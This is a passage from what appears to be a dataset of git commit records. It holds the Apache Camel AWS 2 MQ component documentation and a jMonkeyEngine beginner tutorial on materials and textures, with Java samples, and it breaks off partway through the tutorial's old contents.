*secretKey* (producer) | Amazon AWS Secret Key | | String\n| *region* (producer) | The region in which MQ client needs to work | | String\n| *basicPropertyBinding* (advanced) | Whether the component should use basic property binding (Camel 2.x) or the newer property binding with additional capabilities | false | boolean\n| *lazyStartProducer* (producer) | Whether the producer should be started lazy (on the first message). By starting lazy you can use this to allow CamelContext and routes to startup in situations where a producer may otherwise fail during starting and cause the route to fail being started. By deferring this startup to be lazy then the startup failure can be handled during routing messages via Camel's routing error handlers. Beware that when the first message is processed then creating and starting the producer may take a little time and prolong the total processing time of the processing. | false | boolean\n|===\n\/\/ component options: END\n\n\n\n\n\/\/ endpoint options: START\nThe AWS 2 MQ endpoint is configured using URI syntax:\n\n----\naws2-mq:label\n----\n\nwith the following path and query parameters:\n\n=== Path Parameters (1 parameters):\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *label* | *Required* Logical name | | String\n|===\n\n\n=== Query Parameters (11 parameters):\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *accessKey* (producer) | Amazon AWS Access Key | | String\n| *amazonMqClient* (producer) | To use a existing configured AmazonMQClient as client | | MqClient\n| *lazyStartProducer* (producer) | Whether the producer should be started lazy (on the first message). By starting lazy you can use this to allow CamelContext and routes to startup in situations where a producer may otherwise fail during starting and cause the route to fail being started. By deferring this startup to be lazy then the startup failure can be handled during routing messages via Camel's routing error handlers. Beware that when the first message is processed then creating and starting the producer may take a little time and prolong the total processing time of the processing. | false | boolean\n| *operation* (producer) | *Required* The operation to perform. It can be listBrokers,createBroker,deleteBroker | | MQ2Operations\n| *proxyHost* (producer) | To define a proxy host when instantiating the MQ client | | String\n| *proxyPort* (producer) | To define a proxy port when instantiating the MQ client | | Integer\n| *proxyProtocol* (producer) | To define a proxy protocol when instantiating the MQ client | HTTPS | Protocol\n| *region* (producer) | The region in which MQ client needs to work. When using this parameter, the configuration will expect the capitalized name of the region (for example AP_EAST_1) You'll need to use the name Regions.EU_WEST_1.name() | | String\n| *secretKey* (producer) | Amazon AWS Secret Key | | String\n| *basicPropertyBinding* (advanced) | Whether the endpoint should use basic property binding (Camel 2.x) or the newer property binding with additional capabilities | false | boolean\n| *synchronous* (advanced) | Sets whether synchronous processing should be strictly used, or Camel is allowed to use asynchronous processing (if supported). | false | boolean\n|===\n\/\/ endpoint options: END\n\n\/\/ spring-boot-auto-configure options: START\n\/\/ spring-boot-auto-configure options: END\n\n\n\n\nRequired MQ component options\n\nYou have to provide the amazonMqClient in the\nRegistry or your accessKey and secretKey to access\nthe https:\/\/aws.amazon.com\/amazon-mq\/[Amazon MQ] service.\n\n== Usage\n\n=== Message headers evaluated by the MQ producer\n\n[width=\"100%\",cols=\"10%,10%,80%\",options=\"header\",]\n|=======================================================================\n|Header |Type |Description\n\n|`CamelAwsMQMaxResults` |`String` |The number of results that must be retrieved from listBrokers operation\n\n|`CamelAwsMQBrokerName` |`String` |The broker name\n\n|`CamelAwsMQOperation` |`String` |The operation we want to perform\n\n|`CamelAwsMQBrokerId` |`String` |The broker id\n\n|`CamelAwsMQBrokerDeploymentMode` |`String` |The deployment mode for the broker in the createBroker operation\n\n|`CamelAwsMQBrokerInstanceType` |`String` |The instance type for the MQ machine in the createBroker operation\n\n|`CamelAwsMQBrokerEngine` |`String` |The Broker Engine for MQ. Default is ACTIVEMQ\n\n|`CamelAwsMQBrokerEngineVersion` |`String` |The Broker Engine Version for MQ. Currently you can choose between 5.15.6 and 5.15.0 of ACTIVEMQ\n\n|`CamelAwsMQBrokerUsers` |`List<User>` |The list of users for MQ\n\n|`CamelAwsMQBrokerPubliclyAccessible` |`Boolean` |If the MQ instance must be publicly available or not. Default is false.\n|=======================================================================\n\n=== MQ Producer operations\n\nCamel-AWS MQ component provides the following operation on the producer side:\n\n- listBrokers\n- createBroker\n- deleteBroker\n- rebootBroker\n- updateBroker\n- describeBroker\n\n== Producer Examples\n\n- listBrokers: this operation will list the available MQ Brokers in AWS\n\n[source,java]\n--------------------------------------------------------------------------------\nfrom(\"direct:listBrokers\")\n .to(\"aws2-mq:\/\/test?amazonMqClient=#amazonMqClient&operation=listBrokers\")\n--------------------------------------------------------------------------------\n\n== Automatic detection of MqClient client in registry\n\nThe component is capable of detecting the presence of an MqClient bean into the registry.\nIf it's the only instance of that type it will be used as client and you won't have to define it as uri parameter.\nThis may be really useful for smarter configuration of the endpoint.\n\nDependencies\n\nMaven users will need to add the following dependency to their pom.xml.\n\n*pom.xml*\n\n[source,xml]\n---------------------------------------\n<dependency>\n <groupId>org.apache.camel<\/groupId>\n <artifactId>camel-aws2-mq<\/artifactId>\n <version>${camel-version}<\/version>\n<\/dependency>\n---------------------------------------\n\nwhere `$\\{camel-version\\}` must be replaced by the actual version of Camel.\n","old_contents":"[[aws2-mq-component]]\n= AWS 2 MQ Component\n:page-source: components\/camel-aws2-mq\/src\/main\/docs\/aws2-mq-component.adoc\n\n*Since Camel 3.1*\n\n\/\/ HEADER START\n*Only producer is supported*\n\/\/ HEADER END\n\nThe MQ component supports create, run, start, stop and terminate\nhttps:\/\/aws.amazon.com\/amazon-mq\/[AWS MQ] instances.\n\nPrerequisites\n\nYou must have a valid Amazon Web Services developer account, and be\nsigned up to use Amazon MQ. More information is available at\nhttps:\/\/aws.amazon.com\/amazon-mq\/[Amazon MQ].\n\n== URI Format\n\n[source,java]\n-------------------------\naws2-mq:\/\/label[?options]\n-------------------------\n\nYou can append query options to the URI in the following format,\n?options=value&option2=value&...\n\n== URI Options\n\n\n\/\/ component options: START\nThe AWS 2 MQ component supports 6 options, which are listed below.\n\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *configuration* (advanced) | The AWS MQ default configuration | | MQ2Configuration\n| *accessKey* (producer) | Amazon AWS Access Key | | String\n| *secretKey* (producer) | Amazon AWS Secret Key | | String\n| *region* (producer) | The region in which MQ client needs to work | | String\n| *basicPropertyBinding* (advanced) | Whether the component should use basic property binding (Camel 2.x) or the newer property binding with additional capabilities | false | boolean\n| *lazyStartProducer* (producer) | Whether the producer should be started lazy (on the first message). By starting lazy you can use this to allow CamelContext and routes to startup in situations where a producer may otherwise fail during starting and cause the route to fail being started. By deferring this startup to be lazy then the startup failure can be handled during routing messages via Camel's routing error handlers. Beware that when the first message is processed then creating and starting the producer may take a little time and prolong the total processing time of the processing. | false | boolean\n|===\n\/\/ component options: END\n\n\n\n\n\/\/ endpoint options: START\nThe AWS 2 MQ endpoint is configured using URI syntax:\n\n----\naws2-mq:label\n----\n\nwith the following path and query parameters:\n\n=== Path Parameters (1 parameters):\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *label* | *Required* Logical name | | String\n|===\n\n\n=== Query Parameters (11 parameters):\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *accessKey* (producer) | Amazon AWS Access Key | | String\n| *amazonMqClient* (producer) | To use a existing configured AmazonMQClient as client | | MqClient\n| *lazyStartProducer* (producer) | Whether the producer should be started lazy (on the first message). By starting lazy you can use this to allow CamelContext and routes to startup in situations where a producer may otherwise fail during starting and cause the route to fail being started. By deferring this startup to be lazy then the startup failure can be handled during routing messages via Camel's routing error handlers. Beware that when the first message is processed then creating and starting the producer may take a little time and prolong the total processing time of the processing. | false | boolean\n| *operation* (producer) | *Required* The operation to perform. It can be listBrokers,createBroker,deleteBroker | | MQ2Operations\n| *proxyHost* (producer) | To define a proxy host when instantiating the MQ client | | String\n| *proxyPort* (producer) | To define a proxy port when instantiating the MQ client | | Integer\n| *proxyProtocol* (producer) | To define a proxy protocol when instantiating the MQ client | HTTPS | Protocol\n| *region* (producer) | The region in which MQ client needs to work. When using this parameter, the configuration will expect the capitalized name of the region (for example AP_EAST_1) You'll need to use the name Regions.EU_WEST_1.name() | | String\n| *secretKey* (producer) | Amazon AWS Secret Key | | String\n| *basicPropertyBinding* (advanced) | Whether the endpoint should use basic property binding (Camel 2.x) or the newer property binding with additional capabilities | false | boolean\n| *synchronous* (advanced) | Sets whether synchronous processing should be strictly used, or Camel is allowed to use asynchronous processing (if supported). | false | boolean\n|===\n\/\/ endpoint options: END\n\n\/\/ spring-boot-auto-configure options: START\n\/\/ spring-boot-auto-configure options: END\n\n\n\n\nRequired MQ component options\n\nYou have to provide the amazonMqClient in the\nRegistry or your accessKey and secretKey to access\nthe https:\/\/aws.amazon.com\/amazon-mq\/[Amazon MQ] service.\n\n== Usage\n\n=== Message headers evaluated by the MQ producer\n\n[width=\"100%\",cols=\"10%,10%,80%\",options=\"header\",]\n|=======================================================================\n|Header |Type |Description\n\n|`CamelAwsMQMaxResults` |`String` |The number of results that must be retrieved from listBrokers operation\n\n|`CamelAwsMQBrokerName` |`String` |The broker name\n\n|`CamelAwsMQOperation` |`String` |The operation we want to perform\n\n|`CamelAwsMQBrokerId` |`String` |The broker id\n\n|`CamelAwsMQBrokerDeploymentMode` |`String` |The deployment mode for the broker in the createBroker operation\n\n|`CamelAwsMQBrokerInstanceType` |`String` |The instance type for the MQ machine in the createBroker operation\n\n|`CamelAwsMQBrokerEngine` |`String` |The Broker Engine for MQ. Default is ACTIVEMQ\n\n|`CamelAwsMQBrokerEngineVersion` |`String` |The Broker Engine Version for MQ. Currently you can choose between 5.15.6 and 5.15.0 of ACTIVEMQ\n\n|`CamelAwsMQBrokerUsers` |`List<User>` |The list of users for MQ\n\n|`CamelAwsMQBrokerPubliclyAccessible` |`Boolean` |If the MQ instance must be publicly available or not. Default is false.\n|=======================================================================\n\n=== MQ Producer operations\n\nCamel-AWS MQ component provides the following operation on the producer side:\n\n- listBrokers\n- createBroker\n- deleteBroker\n- rebootBroker\n- updateBroker\n- describeBroker\n\n== Producer Examples\n\n- listBrokers: this operation will list the available MQ Brokers in AWS\n\n[source,java]\n--------------------------------------------------------------------------------\nfrom(\"direct:listBrokers\")\n .to(\"aws2-mq:\/\/test?amazonMqClient=#amazonMqClient&operation=listBrokers\")\n--------------------------------------------------------------------------------\n\n== Automatic detection of MqClient client in registry\n\nThe component is capable of detecting the presence of an MqClient bean into the registry.\nIf it's the only instance of that type it will be used as client and you won't have to define it as uri parameter.\nThis may be really useful for smarter configuration of the endpoint.\n\nDependencies\n\nMaven users will need to add the following dependency to their pom.xml.\n\n*pom.xml*\n\n[source,xml]\n---------------------------------------\n<dependency>\n <groupId>org.apache.camel<\/groupId>\n <artifactId>camel-aws2-mq<\/artifactId>\n <version>${camel-version}<\/version>\n<\/dependency>\n---------------------------------------\n\nwhere `$\\{camel-version\\}` must be replaced by the actual version of Camel.","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3113dee08cc72152ab717ba716b3c809a170cde1","subject":"remove link","message":"remove link\n","repos":"jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org","old_file":"docs\/modules\/tutorials\/pages\/beginner\/hello_material.adoc","new_file":"docs\/modules\/tutorials\/pages\/beginner\/hello_material.adoc","new_contents":"= jMonkeyEngine 3 Tutorial (6) - Hello Materials\n:author:\n:revnumber:\n:revdate: 2020\/07\/06\n:keywords: documentation, beginner, intro, model, material, color, texture, transparency\n\n\nThe term Material includes everything that influences what the surface of a 3D model looks like: The color, texture, shininess, and opacity\/transparency. Plain coloring is covered in xref:beginner\/hello_node.adoc[Hello Node]. Loading models that come with materials is covered in xref:beginner\/hello_asset.adoc[Hello Asset]. In this tutorial you learn to create and use custom JME3 Material Definitions.\n\nimage::beginner\/beginner-materials.png[beginner-materials.png,320,240,align=\"center\"]\n\n\n\n[TIP]\n====\nTo use the example assets in a new jMonkeyEngine SDK project, right-click your project, select menu:Properties[Libraries > Add Library], and add the \"`jme3-test-data`\" library.\n====\n\n\n\n== Sample Code\n\n[source,java]\n----\npackage jme3test.helloworld;\n\nimport com.jme3.app.SimpleApplication;\nimport com.jme3.light.DirectionalLight;\nimport com.jme3.material.Material;\nimport com.jme3.material.RenderState.BlendMode;\nimport com.jme3.math.ColorRGBA;\nimport com.jme3.math.Vector3f;\nimport com.jme3.renderer.queue.RenderQueue.Bucket;\nimport com.jme3.scene.Geometry;\nimport com.jme3.scene.shape.Box;\nimport com.jme3.scene.shape.Sphere;\nimport com.jme3.texture.Texture;\nimport com.jme3.util.TangentBinormalGenerator;\n\n\/** Sample 6 - how to give an object's surface a material and texture.\n * How to make objects transparent. How to make bumpy and shiny surfaces. *\/\npublic class HelloMaterial extends SimpleApplication {\n\n public static void main(String[] args) {\n HelloMaterial app = new HelloMaterial();\n app.start();\n }\n\n @Override\n public void simpleInitApp() {\n\n \/** A simple textured cube -- in good MIP map quality. *\/\n Box cube1Mesh = new Box( 1f,1f,1f);\n Geometry cube1Geo = new Geometry(\"My Textured Box\", cube1Mesh);\n cube1Geo.setLocalTranslation(new Vector3f(-3f,1.1f,0f));\n Material cube1Mat = new Material(assetManager,\n \"Common\/MatDefs\/Misc\/Unshaded.j3md\");\n Texture cube1Tex = assetManager.loadTexture(\n \"Interface\/Logo\/Monkey.jpg\");\n cube1Mat.setTexture(\"ColorMap\", cube1Tex);\n cube1Geo.setMaterial(cube1Mat);\n rootNode.attachChild(cube1Geo);\n\n \/** A translucent\/transparent texture, similar to a window frame. *\/\n Box cube2Mesh = new Box( 1f,1f,0.01f);\n Geometry cube2Geo = new Geometry(\"window frame\", cube2Mesh);\n Material cube2Mat = new Material(assetManager,\n \"Common\/MatDefs\/Misc\/Unshaded.j3md\");\n cube2Mat.setTexture(\"ColorMap\",\n assetManager.loadTexture(\"Textures\/ColoredTex\/Monkey.png\"));\n cube2Mat.getAdditionalRenderState().setBlendMode(BlendMode.Alpha);\n cube2Geo.setQueueBucket(Bucket.Transparent);\n cube2Geo.setMaterial(cube2Mat);\n rootNode.attachChild(cube2Geo);\n\n \/** A bumpy rock with a shiny light effect.*\/\n Sphere sphereMesh = new Sphere(32,32, 2f);\n Geometry sphereGeo = new Geometry(\"Shiny rock\", sphereMesh);\n sphereMesh.setTextureMode(Sphere.TextureMode.Projected); \/\/ better quality on spheres\n TangentBinormalGenerator.generate(sphereMesh); \/\/ for lighting effect\n Material sphereMat = new Material(assetManager,\n \"Common\/MatDefs\/Light\/Lighting.j3md\");\n sphereMat.setTexture(\"DiffuseMap\",\n assetManager.loadTexture(\"Textures\/Terrain\/Pond\/Pond.jpg\"));\n sphereMat.setTexture(\"NormalMap\",\n assetManager.loadTexture(\"Textures\/Terrain\/Pond\/Pond_normal.png\"));\n sphereMat.setBoolean(\"UseMaterialColors\",true);\n sphereMat.setColor(\"Diffuse\",ColorRGBA.White);\n sphereMat.setColor(\"Specular\",ColorRGBA.White);\n sphereMat.setFloat(\"Shininess\", 64f); \/\/ [0,128]\n sphereGeo.setMaterial(sphereMat);\n sphereGeo.setLocalTranslation(0,2,-2); \/\/ Move it a bit\n sphereGeo.rotate(1.6f, 0, 0); \/\/ Rotate it a bit\n rootNode.attachChild(sphereGeo);\n\n \/** Must add a light to make the lit object visible! *\/\n DirectionalLight sun = new DirectionalLight();\n sun.setDirection(new Vector3f(1,0,-2).normalizeLocal());\n sun.setColor(ColorRGBA.White);\n rootNode.addLight(sun);\n\n }\n}\n\n----\n\nYou should see\n\n* Left \u2013 A cube with a brown monkey texture.\n* Right \u2013 A translucent monkey picture in front of a shiny bumpy rock.\n\nMove around with the WASD keys to have a closer look at the translucency, and the rock's bumpiness.\n\n\n== Simple Unshaded Texture\n\nTypically you want to give objects in your scene textures: It can be rock, grass, brick, wood, water, metal, paper\u2026 A texture is a normal image file in JPG or PNG format. In this example, you create a box with a simple unshaded Monkey texture as material.\n\n[source,java]\n----\n\n \/** A simple textured cube -- in good MIP map quality. *\/\n Box cube1Mesh = new Box( 1f,1f,1f);\n Geometry cube1Geo = new Geometry(\"My Textured Box\", cube1Mesh);\n cube1Geo.setLocalTranslation(new Vector3f(-3f,1.1f,0f));\n Material cube1Mat = new Material(assetManager,\n \"Common\/MatDefs\/Misc\/Unshaded.j3md\");\n Texture cube1Tex = assetManager.loadTexture(\n \"Interface\/Logo\/Monkey.jpg\");\n cube1Mat.setTexture(\"ColorMap\", cube1Tex);\n cube1Geo.setMaterial(cube1Mat);\n rootNode.attachChild(cube1Geo);\n\n----\n\nHere is what we did: to create a textured box:\n\n. Create a Geometry `cube1Geo` from a Box mesh `cube1Mesh`.\n. Create a Material `cube1Mat` based on jME3's default `Unshaded.j3md` material definition.\n. Create a texture `cube1Tex` from the `Monkey.jpg` file in the `assets\/Interface\/Logo\/` directory of the project.\n. Load the texture `cube1Tex` into the `ColorMap` layer of the material `cube1Mat`.\n. Apply the material to the cube, and attach the cube to the rootnode.\n\n\n== Transparent Unshaded Texture\n\n`Monkey.png` is the same texture as `Monkey.jpg`, but with an added alpha channel. The alpha channel allows you to specify which areas of the texture you want to be opaque or transparent: Black areas of the alpha channel remain opaque, gray areas become translucent, and white areas become transparent.\n\nFor a partially translucent\/transparent texture, you need:\n\n* A Texture with alpha channel\n* A Texture with blend mode of `BlendMode.Alpha`\n* A Geometry in the `Bucket.Transparent` render bucket. +\nThis bucket ensures that the transparent object is drawn on top of objects behind it, and they show up correctly under the transparent parts.\n\n[source,java]\n----\n\n \/** A translucent\/transparent texture, similar to a window frame. *\/\n Box cube2Mesh = new Box( 1f,1f,0.01f);\n Geometry cube2Geo = new Geometry(\"window frame\", cube2Mesh);\n Material cube2Mat = new Material(assetManager,\n \"Common\/MatDefs\/Misc\/Unshaded.j3md\");\n cube2Mat.setTexture(\"ColorMap\",\n assetManager.loadTexture(\"Textures\/ColoredTex\/Monkey.png\"));\n cube2Mat.getAdditionalRenderState().setBlendMode(BlendMode.Alpha); \/\/ !\n cube2Geo.setQueueBucket(Bucket.Transparent); \/\/ !\n cube2Geo.setMaterial(cube2Mat);\n rootNode.attachChild(cube2Geo);\n\n----\n\nFor non-transparent objects, the drawing order is not so important, because the z-buffer already keeps track of whether a pixel is behind something else or not, and the color of an opaque pixel doesn't depend on the pixels under it, this is why opaque Geometries can be drawn in any order.\n\nWhat you did for the transparent texture is the same as before, with only one added step for the transparency.\n\n. Create a Geometry `cube2Geo` from a Box mesh `cube2Mesh`. This Box Geometry is flat upright box (because z=0.01f).\n. Create a Material `cube2Mat` based on jME3's default `Unshaded.j3md` material definition.\n. Create a texture `cube2Tex` from the `Monkey.png` file in the `assets\/Textures\/ColoredTex\/` directory of the project. This PNG file must have an alpha layer.\n. *Activate transparency in the material by setting the blend mode to Alpha.*\n. *Set the QueueBucket of the Geometry to `Bucket.Transparent`.*\n. Load the texture `cube2Tex` into the `ColorMap` layer of the material `cube2Mat`.\n. Apply the material to the cube, and attach the cube to the rootnode.\n\n\n\n[TIP]\n====\nLearn more about creating PNG images with an alpha layer in the help system of your graphic editor.\n====\n\n\n\n== Shininess and Bumpiness\n\nBut textures are not all. Have a close look at the shiny sphere \u2013 you cannot get such a nice bumpy material with just a plain texture. You see that JME3 also supports so-called Phong-illuminated materials:\n\nIn a lit material, the standard texture layer is refered to as _DiffuseMap_, any material can use this layer. A lit material can additionally have lighting effects such as _Shininess_ used together with the _SpecularMap_ layer and _Specular_ color. And you can even get a realistically bumpy or cracked surface with help of the _NormalMap_ layer.\n\nLet's have a look at the part of the code example where you create the shiny bumpy rock.\n\n. Create a Geometry from a Sphere shape. Note that this shape is a normal smooth sphere mesh.\n+\n[source,java]\n----\n\n Sphere sphereMesh = new Sphere(32,32, 2f);\n Geometry sphereGeo = new Geometry(\"Shiny rock\", sphereMesh);\n----\n\n.. (Only for Spheres) Change the sphere's TextureMode to make the square texture project better onto the sphere.\n+\n[source,java]\n----\n\n sphereMesh.setTextureMode(Sphere.TextureMode.Projected);\n----\n\n.. You must generate TangentBinormals for the mesh so you can use the NormalMap layer of the texture.\n+\n[source,java]\n----\n\n TangentBinormalGenerator.generate(sphereMesh);\n----\n\n\n. Create a material based on the `Lighting.j3md` default material.\n+\n[source,java]\n----\n\n Material sphereMat = new Material(assetManager,\n \"Common\/MatDefs\/Light\/Lighting.j3md\");\n----\n\n.. Set a standard rocky texture in the `DiffuseMap` layer.\n+\nimage::https:\/\/github.com\/jMonkeyEngine\/jmonkeyengine\/raw\/445f7ed010199d30c484fe75bacef4b87f2eb38e\/jme3-testdata\/src\/main\/resources\/Textures\/Terrain\/Pond\/Pond.jpg[Pond.jpg,64,64,align=\"right\"]\n+\n[source,java]\n----\n\n sphereMat.setTexture(\"DiffuseMap\",\n assetManager.loadTexture(\"Textures\/Terrain\/Pond\/Pond.jpg\"));\n\n----\n\n.. Set the `NormalMap` layer that contains the bumpiness. The NormalMap was generated for this particular DiffuseMap with a special tool (e.g. Blender).\n+\nimage::https:\/\/github.com\/jMonkeyEngine\/jmonkeyengine\/raw\/445f7ed010199d30c484fe75bacef4b87f2eb38e\/jme3-testdata\/src\/main\/resources\/Textures\/Terrain\/Pond\/Pond_normal.png[Pond_normal.png,64,64,align=\"right\"]\n+\n[source,java]\n----\n\n sphereMat.setTexture(\"NormalMap\",\n assetManager.loadTexture(\"Textures\/Terrain\/Pond\/Pond_normal.png\"));\n----\n\n.. Set the Material's Shininess to a value between 1 and 128. For a rock, a low fuzzy shininess is appropriate. Use material colors to define the shiny Specular color.\n+\n[source,java]\n----\n\n sphereMat.setBoolean(\"UseMaterialColors\",true);\n sphereMat.setColor(\"Diffuse\",ColorRGBA.White); \/\/ minimum material color\n sphereMat.setColor(\"Specular\",ColorRGBA.White); \/\/ for shininess\n sphereMat.setFloat(\"Shininess\", 64f); \/\/ [1,128] for shininess\n----\n\n\n. Assign your newly created material to the Geometry.\n+\n[source,java]\n----\n\n sphereGeo.setMaterial(sphereMat);\n----\n\n. Let's move and rotate the geometry a bit to position it better.\n+\n[source,java]\n----\n\n sphereGeo.setLocalTranslation(0,2,-2); \/\/ Move it a bit\n sphereGeo.rotate(1.6f, 0, 0); \/\/ Rotate it a bit\n rootNode.attachChild(sphereGeo);\n----\n\n\nRemember that any Lighting.j3md-based material requires a light source, as shown in the full code sample above.\n\n\n\n[TIP]\n====\nTo deactivate Shininess, do not set `Shininess` to 0, but instead set the `Specular` color to `ColorRGBA.Black`.\n====\n\n\n\n== Default Material Definitions\n\nAs you have seen, you can find the following default materials in `jme\/core-data\/Common\/MatDefs\/\u2026`.\n[cols=\"20,40,40\", options=\"header\"]\n|===\n\na| Default Definition\na| Usage\n<a| Parameters\n\na| `Misc\/Unshaded.j3md`\na| Colored: Use with mat.setColor() and ColorRGBA. +\nTextured: Use with mat.setTexture() and Texture.\na| Color : Color +\nColorMap : Texture2D\n\n<a| `Light\/Lighting.j3md`\na| Use with shiny Textures, Bump- and NormalMaps textures. +\nRequires a light source.\na| Ambient, Diffuse, Specular : Color +\nDiffuseMap, NormalMap, SpecularMap : Texture2D +\nShininess : Float\n\n|===\n\nFor a game, you create custom Materials based on these existing MaterialDefintions \u2013 as you have just seen in the example with the shiny rock's material.\n\n\n== Exercises\n\n\n=== Exercise 1: Custom .j3m Material\n\nLook at the shiny rocky sphere above again. It takes several lines to create and set the Material.\n\n* Note how it loads the `Lighting.j3md` Material definition.\n* Note how it sets the `DiffuseMap` and `NormalMap` to a texture path.\n* Note how it activates `UseMaterialColors` and sets `Specular` and `Diffuse` to 4 float values (RGBA color).\n* Note how it sets `Shininess` to 64.\n\nIf you want to use one custom material for several models, you can store it in a .j3m file, and save a few lines of code every time.\n\nYou create a j3m file as follows:\n\n. Create a plain text file `assets\/Materials\/MyCustomMaterial.j3m` in your project directory, with the following content:\n+\n[source]\n----\nMaterial My shiny custom material : Common\/MatDefs\/Light\/Lighting.j3md {\n MaterialParameters {\n DiffuseMap : Textures\/Terrain\/Pond\/Pond.jpg\n NormalMap : Textures\/Terrain\/Pond\/Pond_normal.png\n UseMaterialColors : true\n Specular : 1.0 1.0 1.0 1.0\n Diffuse : 1.0 1.0 1.0 1.0\n Shininess : 64.0\n }\n}\n\n----\n\n** Note that `Material` is a fixed keyword.\n** Note that `My shiny custom material` is a String that you can choose to describe the material.\n** Note how the code sets all the same properties as before!\n\n. In the code sample, comment out the eight lines that have `sphereMat` in them.\n. Below this line, add the following line:\n+\n[source,java]\n----\nsphereGeo.setMaterial((Material) assetManager.loadMaterial(\n \"Materials\/MyCustomMaterial.j3m\"));\n\n----\n\n. Run the app. The result is the same.\n\nUsing this new custom material `MyCustomMaterial.j3m` only takes one line. You have replaced the eight lines of an on-the-fly material definition with one line that loads a custom material from a file. Using .j3m files is very handy if you use the same material often.\n\n\n=== Exercise 2: Bumpiness and Shininess\n\nGo back to the bumpy rock sample above:\n\n. Comment out the DiffuseMap line, and run the app. (Uncomment it again.)\n** Which property of the rock is lost?\n\n. Comment out the NormalMap line, and run the app. (Uncomment it again.)\n** Which property of the rock is lost?\n\n. Change the value of Shininess to values like 0, 63, 127.\n** What aspect of the Shininess changes?\n\n\n\n== Conclusion\n\nYou have learned how to create a Material, specify its properties, and use it on a Geometry. You know how to load an image file (.png, .jpg) as texture into a material. You know to save texture files in a subfolder of your project's `assets\/Textures\/` directory.\n\nYou have also learned that a material can be stored in a .j3m file. The file references a built-in MaterialDefinition and specifies values for properties of that MaterialDefinition. You know to save your custom .j3m files in your project's `assets\/Materials\/` directory.\n\n*See also:*\n\n* xref:ROOT:jme3\/intermediate\/how_to_use_materials.adoc[How to Use Materials]\n* xref:ROOT:sdk\/material_editing.adoc[Material Editing]\n* link:https:\/\/hub.jmonkeyengine.org\/t\/jmonkeyengine3-material-system-full-explanation\/12947[Materials] forum thread\n\/\/* link:http:\/\/nbviewer.jupyter.org\/github\/jMonkeyEngine\/wiki\/blob\/master\/src\/docs\/resources\/tutorials\/material\/jME3_materials.pdf[jME3 Materials documentation (PDF)]\n* link:http:\/\/www.youtube.com\/watch?v=Feu3-mrpolc[Video Tutorial: Editing and Assigning Materials to Models in jMonkeyEngine SDK (from 2010, is there a newer one?]\n* link:https:\/\/www.blender.org\/support\/tutorials\/[Creating textures in Blender]\n","old_contents":"= jMonkeyEngine 3 Tutorial (6) - Hello Materials\n:author:\n:revnumber:\n:revdate: 2020\/07\/06\n:keywords: documentation, beginner, intro, model, material, color, texture, transparency\n\n\nThe term Material includes everything that influences what the surface of a 3D model looks like: The color, texture, shininess, and opacity\/transparency. Plain coloring is covered in xref:beginner\/hello_node.adoc[Hello Node]. Loading models that come with materials is covered in xref:beginner\/hello_asset.adoc[Hello Asset]. In this tutorial you learn to create and use custom JME3 Material Definitions.\n\nimage::beginner\/beginner-materials.png[beginner-materials.png,320,240,align=\"center\"]\n\n\n\n[TIP]\n====\nTo use the example assets in a new jMonkeyEngine SDK project, right-click your project, select menu:Properties[Libraries > Add Library], and add the \"`jme3-test-data`\" library.\n====\n\n\n\n== Sample Code\n\n[source,java]\n----\npackage jme3test.helloworld;\n\nimport com.jme3.app.SimpleApplication;\nimport com.jme3.light.DirectionalLight;\nimport com.jme3.material.Material;\nimport com.jme3.material.RenderState.BlendMode;\nimport com.jme3.math.ColorRGBA;\nimport com.jme3.math.Vector3f;\nimport com.jme3.renderer.queue.RenderQueue.Bucket;\nimport com.jme3.scene.Geometry;\nimport com.jme3.scene.shape.Box;\nimport com.jme3.scene.shape.Sphere;\nimport com.jme3.texture.Texture;\nimport com.jme3.util.TangentBinormalGenerator;\n\n\/** Sample 6 - how to give an object's surface a material and texture.\n * How to make objects transparent. How to make bumpy and shiny surfaces. *\/\npublic class HelloMaterial extends SimpleApplication {\n\n public static void main(String[] args) {\n HelloMaterial app = new HelloMaterial();\n app.start();\n }\n\n @Override\n public void simpleInitApp() {\n\n \/** A simple textured cube -- in good MIP map quality. *\/\n Box cube1Mesh = new Box( 1f,1f,1f);\n Geometry cube1Geo = new Geometry(\"My Textured Box\", cube1Mesh);\n cube1Geo.setLocalTranslation(new Vector3f(-3f,1.1f,0f));\n Material cube1Mat = new Material(assetManager,\n \"Common\/MatDefs\/Misc\/Unshaded.j3md\");\n Texture cube1Tex = assetManager.loadTexture(\n \"Interface\/Logo\/Monkey.jpg\");\n cube1Mat.setTexture(\"ColorMap\", cube1Tex);\n cube1Geo.setMaterial(cube1Mat);\n rootNode.attachChild(cube1Geo);\n\n \/** A translucent\/transparent texture, similar to a window frame. *\/\n Box cube2Mesh = new Box( 1f,1f,0.01f);\n Geometry cube2Geo = new Geometry(\"window frame\", cube2Mesh);\n Material cube2Mat = new Material(assetManager,\n \"Common\/MatDefs\/Misc\/Unshaded.j3md\");\n cube2Mat.setTexture(\"ColorMap\",\n assetManager.loadTexture(\"Textures\/ColoredTex\/Monkey.png\"));\n cube2Mat.getAdditionalRenderState().setBlendMode(BlendMode.Alpha);\n cube2Geo.setQueueBucket(Bucket.Transparent);\n cube2Geo.setMaterial(cube2Mat);\n rootNode.attachChild(cube2Geo);\n\n \/** A bumpy rock with a shiny light effect.*\/\n Sphere sphereMesh = new Sphere(32,32, 2f);\n Geometry sphereGeo = new Geometry(\"Shiny rock\", sphereMesh);\n sphereMesh.setTextureMode(Sphere.TextureMode.Projected); \/\/ better quality on spheres\n TangentBinormalGenerator.generate(sphereMesh); \/\/ for lighting effect\n Material sphereMat = new Material(assetManager,\n \"Common\/MatDefs\/Light\/Lighting.j3md\");\n sphereMat.setTexture(\"DiffuseMap\",\n assetManager.loadTexture(\"Textures\/Terrain\/Pond\/Pond.jpg\"));\n sphereMat.setTexture(\"NormalMap\",\n assetManager.loadTexture(\"Textures\/Terrain\/Pond\/Pond_normal.png\"));\n 